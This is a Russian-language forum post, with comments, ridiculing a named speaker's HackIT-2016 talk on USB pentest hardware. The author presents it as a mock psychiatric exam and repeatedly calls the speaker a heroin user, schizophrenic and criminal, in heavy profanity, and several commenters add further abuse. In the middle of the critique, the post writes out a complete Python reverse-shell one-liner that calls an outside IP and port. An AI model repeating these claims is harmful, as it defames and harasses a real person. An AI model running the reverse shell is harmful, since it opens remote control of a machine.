← Форум · Повна версія · EN · RU · UK

Фанбой Mr.Robot'а на HackIT-2016: "Мои пруфы очень специфичны"

legacy_l33t_- · 30.11.2016 · 0 балів · 0 переглядів

Дорогие ебаные читатели и ебанная Редакция, хочу поделиться своими впечатлениями от посещения конференции HackIT, проходившей недавно в Харькове, цена билета на которую колебалась от 200 до 1500 гривен. Идя на конференцию, где должны были выступать и соревноваться в CTF лучшие из лучших специалистов в Украине по информационной безопасности, меня не покидала мысль что эта конференция — очередная бессмысленная пафосная хуйня и бесполезная трата времени, в чем я и убедился позже.

Для того чтобы прояснить примерный уровень большинства выступающих, мною и опытным врачом-психотерапевтом был проанализирован доклад Алексея Мисника «HackIT-2016. USB устройства для пентеста.» Что из этого получилось читайте далее.

«Стартуем !» — именно этой фразой Алексей начинает свой охуитительный доклад. С первых минут видео можно оценить как превосходное ораторское искусство докладчика так и глубокий стиль изложения материала, восхитительную работу оператора также нельзя оставить без внимания, но вернемся к самому Алексею.

Алексей будучи фанатом сериала «Mr. Robot» взял лучшее от этого персонажа себе, а именно: шизофрению и любовь к тяжелым наркотикам, доказательством этого может служить несвязная речь, непредсказуемая смена настроения, тремор конечностей, при этом Алексей не забыл отбросить малозначительные качества: сообразительность, целеустремленность, выдающиеся навыки.

Со всем вышеперечисленным (наркотиками и шизофренией) Алексей решил выступить на конференции, поскольку речь Алексея может быть не понятна обычному человеку, с помощью психотерапевта давайте разберем бред больного. С полным 44-минутным видео вы можете ознакомится по ссылке внизу материала, а здесь нарезка самого «сока» выступления:

дисклеймер: видео может вызвать укачивание и тошноту, благодаря мастерской работе оператора — стабилизация изображения это для слабаков, давайте лучше пальцами напостой крутить zoom-in/zoom-out

Разбираем перлы:

\-Все думают шо есть вот mass storage, что-то можно с ним сделать — мы его видим, на самом деле вся уязвимость только в контроллере

Алексей бормочет что-то невнятное подменяя общепризнанные значения терминов своими вымыслами. По мнению врача это может быть вызвано продолжительным употреблением героина.

\-Я просто проводил два года аудит в гос. структурах по безопасности — поэтому я все там знаю идеально

Делая отступления от темы доклада Алексей, как бывалый специалист не забывает и повыебываться своими «достижениями».

\-Там MS08 подходил к любому компу просто

Больной впадая в бессознательное состояние продолжает нести несвязный бред, на этот раз причиной приступа служит код «MS08». «Что же такое MS08?» этот вопрос возникает в голове у неподготовленного зрителя, опытный врач подсказывает что скорее всего речь идет об уязвимости MS08\_067 в системах Windows, эксплуатируя которую можно получить полный доступ к уязвимой системе. Приступ заканчивается и Алексей продолжает.

\-Он ничем себя не выдаст, вы просто приходите его снимаете, забираете, считываете то шо вам надо

этой фразой Алексей описал все тонкости работы с аппаратным кейлоггером на основе USB, после этого врач сделал неутешительный вывод: пациент — мамкин кулхацкер, занимающийся суходрочкой и запускающий эксплойты в многострадальный localhost.

\-Я проводил как-то аудит, мы смогли взломать одну из машин сотрудника

Алексей признает раздвоения личности, при лечении шизофрении это очень важно. Алексей помнит что начинал аудит он один «Я проводил как-то аудит», но за тем личность раздваивается «мы смогли взломать одну из машин сотрудника». Врач рекоменует пациенту во избежания обострений не проводить больше аудиты. И вообще уйти нахуй со сцены.

\-Я тоже юзер MacBook, кке, мака

Алексей периодически делает отступления чтобы повыебываться. На этот раз причиной выебонов стал MacBook которым владеет пациент.

\-Я сидел в военном институте мы ломали WI-FI соседнего дома

Как настоящий мамкин хакер Алексей не забывает упомянуть о криминальном прошлом. Проникновение в домашнюю сеть граждан Украины используя программно-технические средства и нарушение 361 статьи криминального кодекса Украины по мнению Алексея — достижение о котором стоит рассказать в своем докладе. Сказочный долбоеб — резюмирует психотерапевт.

\-Да я выпускник военного института просто, поэтому что бы вы знали, если Вам надо то можно брутить с соседнего дома WI-FI

Этой фразой Алексей призывает слушателей нарушать закон Украины «Если надо — то можно». Если надо денег — отожми денег, если надо подарить девушки сережки — сорви их с прохожей старушки. Для завершения образа Алексею не хватает только куполов на спине и золотого зуба.

\-То что залоченная винда или мак выдают NTLM хеш при подключении USB устройства, есть при чем официальная статья как это сделать и мы это сделали!

Невероятно, аплодисменты, сделать что-то шаг за шагом имея инструкцию невообразимо сложно, восхитительно !
«К чему вообще этот доклад ?», «Где оригинальный контент ?», «Что этот уебан тут делает ?» — Именно эти вопросы задает большинство специалистов в области информационной безопасности слушая Алексея.

\-А от Mac OS, в чем сама уязвимость атаки ?

«Уязвимость атаки» — таким беспощадным для сознания здравомыслящего человека оборотом Алексей пытается выбить врача из игры, но врач смахнув пот со лба, продолжает анализировать состояния больного дальше.

\-Ну был там как-то CTF c SQLIte, база данных, cкуля, но ничего более, яж не пишу под мобильные

Что это вообще за нахуй ? Схуяли платить 1500 грн за вход на конференцию где говорят «скуля» вместо SQL-injection ? Все больше вопросов остается без ответа.

\-Ну это так для затравки, вторая часть будет намного круче

Да, да внимательно Вас слушаем, продолжайте. «Пора вызывать санитаров и срочно госпитализировать больного» — шепотом добавляет психотерапевт.

\-Я сделал очень быстро и с первого раза

Алексей прибегает к излюбленной стратегии — отступление для выебонов.

На этом этапе больше половины доклада позади, но в чем смысл доклада и где оригинальный контент не понятно.

\-Заливая вместе с прошивкой получаете уязвимую флешку

Алексей снова бормочет что-то невнятное употребляя половину слов не к месту и скорее всего сам не понимает о чем рассказывает, надеясь на лучшее врач рекомендует увеличить дозы назначенных Алексею препаратов.

\-Он не пройдет на большинстве систем потому что строчка /bin/bash шоб дать shell нам на удаленном компьютере он не всегда входит в стандартный пакет и чтобы он заработал его нужно подключить ситуация меняеться время от времени так шо надо тестировать на разных системах, я тестировал на Ubuntu 14.04 и без подкачки дополнений вот этот -e /bin/bash shell у меня не получился

Ну что же, для того чтобы понять насколько Алексей хороший специалист врач решает разобрать эту реплику полностью. В nc флаг -e нужен для того чтобы перенаправить STDOUT в STDIN программы обозначенной данным флагом, в современных Linux дистрибутивах утилита nc не поддерживает этот флаг. В данном случае Алексей надеться сделать reverse shell и вместо того чтобы добавить в доклад хоть немного оригинального контента он доставляет на машину, которую будет атаковать, пакеты которых в реальной жизни там не будет. Может проще сразу поставить rootkit ? Есть масса других способов сделать reverse shell, например использывать интерпретаторы python и perl которые есть в каждом современном Linux дистрибутиве, например: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect((«8.8.8.8», 666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\[«/bin/sh»,»-i»\]);’. Не понимая почему Алексей решил заняться информационной безопасностью а не садоводчеством, врач продолжает слушать жалобы больного.

\-Кто знает шо такое reverse shell ? Так ну процентов 30, окей

На этом моменте ситуация окончательно прояснилась, причина по которой Алексея не обоссали во время доклада проста, 70%+ сидящих в аудитории — мечтающие «вайтишники» накопив денег на доставке пиццы и раздаче листовок тут же решили их спустить на курсы от Пивоварова и билет на конференцию от маминых хакеров в надежде чему-то научиться и не повторить судьбу последнего.

\-Я защищен Avast’ом вы все видите, security есть

«…но не в этом здании и не в моем докладе, а где-то, я хочу верить !» — забывает добавить Алексей.

\-Вопрос: кто знает про атаку DNS туннелирование шо это такое ?

Про «атаку DNS туннелирования» не знает даже Иисус, Аллах и Будда вместе взятые. Эта атака существует только в героиновых грезах Алексея. «DNS Tunneling» — это не атака, а метод обхода механизмов защиты основанный на передачи данных используя DNS запросы, применяется в основном для эксфильтрации данных — поясняет врач.

\-Мой доклад окончен, если есть вопросы — задавайте

После доклада Алексея у большинства людей был только один вопрос: «Кто блядь вернет время и деньги потраченные на эту хуйню ?».

Краткое резюме всего доклада: ничего вместо рассказа о поиске и использовании готовых решений, притом зачастую нет понимая как работают эти самые решения нет, и даже вместо того чтобы написать сотню строчек кода для автоматизации процесса подготовки флешки для таргетированной атаки и придать смысл своему докладу, Алексей продолжает радостно рапортовать о его детских экспериментах.

«Тяжелый случай, скорее всего не излечим.» — говорит доктор после знакомства с пациентом. С чем сложно не согласиться. Но когда с Алексеем все стало ясно, появились другие вопросы связанные с организацией и качеством конференций по информационной безопасности в Украине. А это уже совсем другая история…

Ссылки.
1\. Полное видео доклада (44 минуты): https://www.youtube.com/watch?v=72xFaXDXAok
2\. Слайды: http://www.slideshare.net/HackIT-ukraine/usb-66977209
3\. LinkedIn: https://www.linkedin.com/in/oleksii-misnik-08158255
4\. HackIt http://2016.hackit-ukraine.com/rus


Коментарі (27)


legacy_Алиса · 30.11.2016 · 0 балів · відповісти

второй нах!

докладчик мудак, типовый ит-шник

legacy_Парвиз · 30.11.2016 · 0 балів · відповісти

Дядя, дай макбук.

legacy_Макс_Ёёменко · 30.11.2016 · 0 балів · відповісти

Зайди ко мне в кабинет немедленно. Ha-ha-ha-ha!

legacy_Пеппа · 30.11.2016 · 0 балів · відповісти

Как же дохуя текста
КР СТ ТЛ (краткость сестра таланта)

legacy_Пиздабон_1 · 30.11.2016 · 0 балів · відповісти

И Н со своими сокращениями, кусок дерьма с дислексией.

legacy_Капитан_Очевидность · 30.11.2016 · 0 балів · відповісти

4:44 Пацанчик в толчок просто хочет, ходит по аудитории, места себе не находит, предлагает устроить перерыв, а его никто не поддержал 🙂

legacy_JohnnyBeGood · 30.11.2016 · 0 балів · відповісти

О BuildStuff конференции никто не напишет?

legacy_Ходил_на_BuildStuff · 30.11.2016 · 0 балів · відповісти

Я напишу. Ходил на BuildStuff. вырванные 2 дня из моей жизни, хорошо хоть что не из своего кармана платил. Новых знаний получил 0!

legacy_JohnnyBeGood · 30.11.2016 · 0 балів · відповісти

Согласен. Хоть там было несколько интересных докладов, — не пойду в следующий раз.

legacy_Туалетная_бумага · 30.11.2016 · 0 балів · відповісти

Я вот сижу тут такой скромный с зп 800 бачей. И вижу приходят «мидлы c 10 лет опытом» на интревью который на просьбу «Раскажите что такое пост и гет запросы и разницу между ними» отвечают «это глобальные масивы в PHP» и не скромно озвучивая свои ожидания «две тисячи долларов налом», и у меня возникает риторический вопрос. ВЫ ЧЕ БЛЯ ПАЦАНЫ АХУЕЛИ?

legacy_17_летний_сеньор · 30.11.2016 · 0 балів · відповісти

Потому что можем и будем.
А ты не завидуй, неудачник.

legacy_CSS-Architect · 30.11.2016 · 0 балів · відповісти

А че ж ты сам двушку не получаешь? Может потому что сам тупой? Или перед менеджером язык в жопу залазит?

legacy_Ахуевающий · 30.11.2016 · 0 балів · відповісти

Пиздец.
Как то я пару лет назад то же хотел вкатиться в ITsec, но как то не пошло. А тут реальный фанбой робота рассказывает такое, что даже я, со своим недосамообучением кулхакинга понимаю какая же это чушь. Блять, а ведь думал посетить какую то конфу безопасников. Ебал я нахуй это дерьмо.

legacy_дядько_ЁСЫПЪ · 30.11.2016 · 0 балів · відповісти

да бля, чьо ви доїблись, марнотратщікі хуєві: дакладчік розпереживався і ліпе єрунду всяку підряд. в мене є знакомий такий як він точь-в-точь, навіть виглядом його нагадує. а Льоха з кимось на пиві вєрняк ліпше би говорив, і жаждущім знаній «собутильнікам» було б інтірєсно ілі послухати його ілі обмінятися досвідом. ше раз, карочє гаваря, впізду всі піздоканфєрєнциї і піздодаклади. читайте книги/форуми/блоги

legacy_vitaliy17 · 30.11.2016 · 0 балів · відповісти

Бляяаааааа… За выслушивание этого еще и деньги хотят ???

legacy_Не_быть_БЫДЛОМ · 30.11.2016 · 0 балів · відповісти

Блядь, я даже знаю где именно это говно училось, в ІССЗІ НТУУ КПІ тем более, даже знаю где жило. А жило в говно казарме, страдало пожызненной хуйней, а потому то и пиздило интернет с соседних домов потому что говно нехотело зарабатывать денег, а клянчил их у мамки и хуярил траву в параше пока никто не видит. Мало того что в этом институте кроме ебаного мозгоправства и военщины нехуя толком нету…. от тудого ВСЕ валят как с ЖОПЫ МИРА, ТАК НЕТ, ЭТО это ебаное чмо своим ущербным и уставшым от выебничества мозгом, и пиздой под носом, пиздило «интернет» у жытелей. Могу сказать единственно в защиту далбоеба что в этом ебаном «институте связи» что на печерске (кст.) У МНОГИХ ГОЛОВА БОЛЬНА ОТ БЕСКОНЕЧНОГО ВЫЕБНИЧЕСТВА ЧТО ОНИ СБУшники итд. Так что прописываем больному: смуззи, стартапы и всего этого много-много шоб прорыгался сука просрался подавился всем этим, а потом надеемся что выздоровеет.
—————
Сука просто задело до боли…

legacy_и_твою_маму_тоже · 30.11.2016 · 0 балів · відповісти

\>>ІССЗІ НТУУ КПІ

шо-шо?

legacy_ненавижу_пиздаболов · 30.11.2016 · 0 балів · відповісти

А что, коммент выше трушный или ты не согласен?!
Я поддерживаю!!!!!!! +10000

legacy_Программист_погорелого_театра · 30.11.2016 · 0 балів · відповісти

После этого видоса этот гусь получает навес — Масторыч.

legacy_goto · 30.11.2016 · 0 балів · відповісти

Шапки-петушка не хватает

legacy_xyi_1 · 30.11.2016 · 0 балів · відповісти

Пизда. Хули еще один дурачек))) таких на конфах дохуя, бо норм человек лучше бабу потянет чем пойдет пиздеть на конфу.

legacy_Парвиз · 30.11.2016 · 0 балів · відповісти

сука ОТДАЙ МОЙ МАКБУК!!! ты все равно блядь пользоваться им не умеешь!

скасувати

legacy_Высерок · 30.11.2016 · 0 балів · відповісти

Короче почитал я статью и понял , что в первую очередь — я долбаеб, ибо я нихуя не шарю в этой вашей безопасности, если тут собрались такие кенты которые легко видят поебень в докладе этого опущенца , скажите че такое почитать интересное? Желательно на буржуйском языке (т.е. на англ, а то буржуй эт от слова Буржуа, что в общем-то францэ) .

PS. Даже без знания того о чем тип пиздит его хуевийшая дикция, несобранность и неспособность составлять слова последовательно вызывает сомнения в его квалификации. И вот эта хуйня с «ШО» я сам говорю как хуйло неграмотное но ты ж, блять, на публике, контролируй себя, нахуя этот суржик.

legacy_JohnnyBeGood · 30.11.2016 · 0 балів · відповісти

хаха. Поддерживаю

legacy_Я_люблю_программировать · 30.11.2016 · 0 балів · відповісти

статья — высер, как и 99% на ебаном

legacy_PbI6A · 30.11.2016 · 0 балів · відповісти

твой высер очень важен для нас, спасибо что потратил время и поделился

legacy_Парвиз · 30.11.2016 · 0 балів · відповісти

Речь любого из Ит-шников — высер на 99%. Мне противно слушать почти каждый из докладов на таких конференциях по той причине, что почти каждый докладчик не владеет ни одним из так называемых по-пацански «софт скилов», а на нормальном языке «навыков общения». Сука, хочется взять и уебать каждому, кто в чат пишет на ломаном рунглише, а потом и в каждом разговоре повсеместно вставляет эти buzzwords, базворды. У меня из ушей кровь течёт от такого


← Форум